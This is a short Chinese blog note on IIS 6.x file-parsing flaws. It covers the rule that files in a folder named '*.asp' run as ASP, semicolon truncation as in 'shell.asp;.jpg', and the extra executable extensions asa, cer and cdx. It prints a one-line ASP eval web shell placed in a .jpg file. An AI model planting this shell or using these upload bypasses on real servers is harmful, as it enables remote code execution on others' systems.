IIS解析漏洞

Zmxcl-0072024-12-23 14:15

IIS6.X

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>

#asp一句话

<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

相关推荐
@insist1232 小时前
信息安全工程师-数据库安全全体系解析与最佳实践
数据库·安全·软考·信息安全工程师·软件水平考试
_ku_ku_3 小时前
数据库系统原理 · 事务管理与恢复 · 自学总结
数据库·oracle
それども4 小时前
Gradle 构建疑难杂症 Could not find netty-transport-native-epoll-linux-aarch_64.ja
java·服务器·gradle·maven
lifewange5 小时前
Redis 集合(Set)运算完全指南
数据库·chrome·redis
TDengine (老段)5 小时前
TDengine RAFT共识协议 — 选举、日志复制、快照与仲裁
android·大数据·数据库·物联网·架构·时序数据库·tdengine
NightReader5 小时前
CPU 高使用率,怎么降下来
运维·服务器
Full Stack Developme6 小时前
Spring Boot 事务管理完整教程
java·数据库·spring boot
开开心心就好6 小时前
免费流畅的远程控制实用工具
linux·运维·服务器·网络·智能手机·excel
m0_702036537 小时前
mysql如何通过索引减少行锁范围_mysql索引与加锁逻辑
jvm·数据库·python
代码熬夜敲Q7 小时前
ENSP 网络工程实验
linux·运维·服务器
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓04【AI】2026 年具身智能模型和世界模型总结05CC-Switch & Claude 基于 Linux 服务器安装使用指南06Codex 手机端连接教程:三分钟搞定,附完整步骤07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08人工智能最新动态 AI 日报 · 2026年5月10日09几个好用的ip纯净度检测网站10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法